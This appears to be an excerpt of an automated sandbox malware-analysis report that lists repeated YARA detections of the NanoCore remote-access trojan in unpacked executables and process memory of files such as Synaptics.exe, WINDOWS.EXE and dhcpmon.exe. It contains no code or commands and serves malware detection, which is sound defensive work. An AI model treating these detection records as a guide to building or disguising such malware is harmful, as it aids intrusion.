            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
